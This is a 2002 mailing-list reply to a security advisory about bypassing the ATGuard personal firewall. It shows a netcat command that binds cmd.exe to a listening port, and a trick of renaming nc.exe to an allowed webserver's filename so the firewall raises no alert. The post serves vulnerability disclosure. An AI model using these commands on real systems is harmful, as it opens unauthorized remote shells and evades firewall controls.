Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible

From: BlueScreen (BlueScreen@IT-Checkpoint.net)
Date: Tue Apr 30 2002 - 04:40:32 PDT

    As far as i see the article you gave me at tooleaky.zensoft.com mostly deals
    with outbound connections.
    The ATGuard-Problem still goes futher, it is also a problem with inbound
    connections.

    I use a Xitami Webserver on Port 50080 for testing purposes.
    This Xitami Webserver is (currently) allowed to accept all connections on
    all ports (this is also a configuration problem,
    but most people just allow inbound connections from any address to any port
    for an application).

    So, i just did the following:

            I:\>cd netcat

            I:\netcat>nc -e c:\winnt\system32\cmd.exe -p 500 -l

    I tried to connect to port 500 with telnet: ATGuard fires up as it is
    supposed to. So, now i did the following:

            I:\netcat>copy nc.exe xiwin32.exe
                    1 Datei(en) kopiert. (Translation for the curious non-german
    readers : 1 File copied :)

            I:\netcat>xiwin32.exe -e c:\winnt\system32\cmd.exe -p 500 -l

    Trying it with telnet again, i got a very nice shell without any notice from
    ATGuard.

    That's why i mentioned also trojan horses in my Advisories - just renaming
    your trojan horse to the name of a program that is allowed
    to accept inbound connections will do the trick.

    > There is no ultimate way to control all outbound communication. If you use
    > your own low-level drivers, no personal firewall can stop you.

    Surely there is no ultimate way. But if you are not aware that a problem
    exists, you can't think about solutions.
    Also, you perhaps will think that your personal firewall is perfectly safe
    while it isn't.

    Best regards,

    BlueScreen / Florian Hobelsberger (UIN: 101782087)
    Member of:
    www.IT-Checkpoint.net
    www.Hackeinsteiger.de
    www.DvLdW.de

    To encrypt classified messages, please download and use this PGP-Key:

    http://www.florian-hobelsberger.de/BlueScreen-PGP-PubKey.txt